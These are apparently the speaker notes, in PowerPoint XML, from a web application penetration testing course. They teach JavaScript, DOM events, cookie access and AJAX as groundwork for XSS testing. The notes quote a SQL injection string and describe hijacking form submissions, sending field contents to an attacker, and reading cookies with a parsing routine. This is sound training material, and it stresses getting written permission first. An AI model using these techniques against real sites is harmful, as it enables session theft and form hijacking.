        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="320516"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While browsers support languages such as VBScript and ActionScript, we have chosen JavaScript due to its popularity.  Web app penetration testers have two separate reasons to understand JavaScript.  First, as we evaluate an application, we need to understand how the client language is behaving and look for issues within the code.  Second, when we try to launch XSS attacks we will need to be able to write at least basic scripts.  This section will help to get us to both goals.</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123</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="321540"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Netscape designed and released LiveScript in 1995, the name was quickly changed to JavaScript.  While the name commonly causes people to think that JavaScript and Java are related, this is not true.  While JavaScript is mainly used by web sites, keep in mind that many other client applications such as e-mail clients and pdf readers support JavaScript embedded in their documents.</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124</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="322564"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In this course we will focus on the use of JavaScript within web pages.  JavaScript can be used within a web pages in two different and distinct ways.  The first is to use script tags.  Either the code can be within the tags or referenced by a src attribute.  The second method of loading JavaScript is as an attribute of an HTML tag.  An example of this would be the onunload event of a body tag.</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125</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="323588"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JavaScript is similar to other languages in that each statement in the code is a command to the browser.  Of course we wouldn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'t be talking about web browsers without mentioning that each browser interprets parts of JavaScript in slightly different ways.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>There are a few points to note regarding JavaScript.  First, it is entirely case sensitive.  This means that the variable "name" is different than the variable "Name".  You can also use the double slash to comment the rest of that line, while the slash asterisk combination in a multi-line comment.  It ends at the asterisk slash characters.</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126</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32461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In this next section, we will discuss the various functions and events within JavaScript.  We will also learn about statements and how JavaScript handles variables.</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127</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="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5" name="Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="325636"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The first type of statement we will look at is the if/else condition.  This allows the code to check the value of a condition and perform an action if it is true.  For example, check to see if the user agent is defined as IE and load the correct AJAX object.  The else statement is an optional block to perform an action if the condition is false.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The next statement is a switch statement.  This allows the programmer to set different actions based on a series of conditions.  Each set of commands is finished by reaching a break statement.  If there isn't a break, the break continues to run commands until one is reached.  This allows for multiple conditions to share commands without repeating the code.</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128</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="326660"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The while statement is the way to run a block of code until a condition is met.  This allows the developer to build the loop without knowing the exact number of times that code must be run.  An example of the way to use this may be to retrieve a web page until it doesn't match the content the code expected.  When this happens, the code would send an alert.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The for loop behaves the same way, except instead of a condition it runs a set number of times.</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129</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Get permission, in writing, from someone with authority.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This is probably the most critical piece of information in the entire class, at least as it relates to your continued employment and freedom.  There are many laws around hacking and many people monitoring their systems.  If you do not get permission to test the security of an application, in writing, from someone with the authority to give you permission, then do not test that application.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This includes "I accidentally discovered a SQL injection flaw in my bank</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s web site!"  No one accidentally types in ' OR 1=1; -- into the money transfer fields of their online bank (especially not educated security professionals). </a:t>
            </a:r>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13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="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3" name="Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="327684"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JavaScript variables are loosely typed.  This means that unlike some languages, the variable can hold any type of data, instead of being limited by how it was declared.  Declaration of a variable is as simple as typing the keyword var followed by the variable name.  The developer can also assign a value while declaring it by placing an equal sign followed by the value.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>One interesting note about variables is that if a variable is re-declared after it has had a value assigned, it will continue to have the value assigned.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The scope of variables is global unless declared within a function, in which case they are only accessible within that function.</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130</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="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7" name="Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="328708"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JavaScript allows for creating functions so that code can be called over and over again instead of having the developer type it again.  These functions can be declared anywhere on the page, but it is convenient to place them in the &lt;head&gt; section of the page so that they are loaded before being called.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Functions can either just run, or they can return a value to where they were called by using the return statement followed by the value that the developer wishes to return.</a:t>
            </a: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131</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="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1" name="Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="329732"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Events are triggers called when an item is in a certain condition.  An example of this would be the onload event that is triggered by an image being loaded by the browser.  The table above lists a series of example events and when they are triggered.  The developer or tester can use these events within a page or item to trigger the JavaScript code they want to run.</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132</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="330756"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Now it's time to look at some examples that would be useful during a penetration test.  We recommend that each of the events is examined and try to think of different ways that they can be twisted to accomplish our goal instead of what they were originally thought of for.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>For example, we might use the onload event on the body to run code that changes the content to reflect what we want the page to say.  Or we could use the onsubmit event on a form to change where the form values are sent.  The onfocus event is very useful for tracking the client's interest within the page.</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133</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="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9" name="Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="331780"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Some other examples of interesting events would be things like the onerror event which can be used for fingerprinting services and port scanning a network.  We may also use things like the onclick and the onblur to change where a link points or send the contents of the form field that was just completed to an attacker.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>All of these events and more can be used by the tester or attacker to control the experience the user has within a page.</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134</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="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3" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33280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In this next section we will discuss the document object model and the various methods and properties exposed by the built in JavaScript objects.</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135</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="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7" name="Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="333828"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The document object model or DOM is a standard interface provide by JavaScript that allows for dynamic access to the pieces of the current page and browser window.  The DOM provides objects such as the Form and Windows objects.  These allow for access and control of the various parts of what they represent.</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136</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="334852"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The document and its window is viewed and managed as a tree.  As we can see from the diagram above, the tree starts with the HTML tag and then branches from there.  Each node from there is a child of the one above it and a parent to any below it.  Each tag may have one or more attribute assigned to it, such as color or size.</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137</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="335876"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Since JavaScript is an object oriented programming language, it provides a series of objects, and developers can create their own.  Objects are a method to provide copies of an item in memory that can be referenced and used separately.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Objects must be initialized instead of just being assigned to a variable.  These objects can provide properties, which are attributes of the object and methods, which are actions.</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138</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="336900"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There are eight different built in objects provided by JavaScript.  They are the string, date, math, window, document, location, history and array objects.  These objects provide various methods and properties and make up a major part of the application code we find and use during penetration tests.</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139</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When planning an attack, it is helpful to understand the server architecture used by a specific application. Depending on the architecture, specific types of vulnerabilities may be present. The next section will cover the various web server architectures and how the attacker views them.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="337924"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One of the main functions that we perform is changing content on the page.  There are various ways to find the item that we are interested in changing.  We could reference the item by its ID or by its name.  We can also loop through each of the items and change all the items of a specific type.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Once we find the item, we can use the various properties, such as the action of a form, to change the content to what we would like.</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140</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="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7" name="Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="338948" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4606925"/>
            <a:ext cx="6400800" cy="4689475"/>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pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Another common function used during tests is to manipulate and/or read cookies.  The attacker can read cookies by calling document.cookie object and property.  When reading cookies, the tester has two choices.  The first is to use the cookie value as a whole or we can use code similar to the listing below to parse the cookie into individual values.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>var a_all_cookies = document.cookie.split( ';' );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>	var a_temp_cookie = '';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>	var cookie_name = '';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>	var cookie_value = '';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>	var b_cookie_found = false; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>	for ( i = 0; i &lt; a_all_cookies.length; i++ )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>	{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>		a_temp_cookie = a_all_cookies[i].split( '=' );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>		cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>		if ( cookie_name == check_name )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>		{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>			b_cookie_found = true;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>			if ( a_temp_cookie.length &gt; 1 )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>			{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>				cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>			}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>			return cookie_value;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>			break;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>		}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>		a_temp_cookie = null;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>		cookie_name = '';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>	}</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141</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="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1" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33997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altLang="zh-CN" dirty="0">
                <a:ea typeface="SimSun" charset="0"/>
                <a:cs typeface="SimSun" charset="0"/>
              </a:rPr>
              <a:t>The next section will discuss the XMLHttpRequest object and AJAX.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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142</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34099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AJAX is the technology used to enable asynchronous communication between your browser and the web server. In old-style web sites, when you click a link, the client has to send a request all the way up the server, the server processes the request and then replies. When the browser gets the entire reply, it redraws the entire screen. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>With AJAX, the JavaScript creates XMLHTTP objects. Those objects can make requests and receive responses asynchronously, updating the display as responses are received. For example, consider Google Maps. When you go to Google Maps and you search for something and slide the map, your browser uses AJAX to make calls back and forth to the server to retrieve the images that make the map. In this way, the map changes dynamically, but the remainder of the page is static and does not need to be redrawn with each change.</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143</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34202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The XMLHttpRequest object has a number of methods and properties but the five below are the most critical to making it work.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="682625" lvl="1" indent="-109538">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
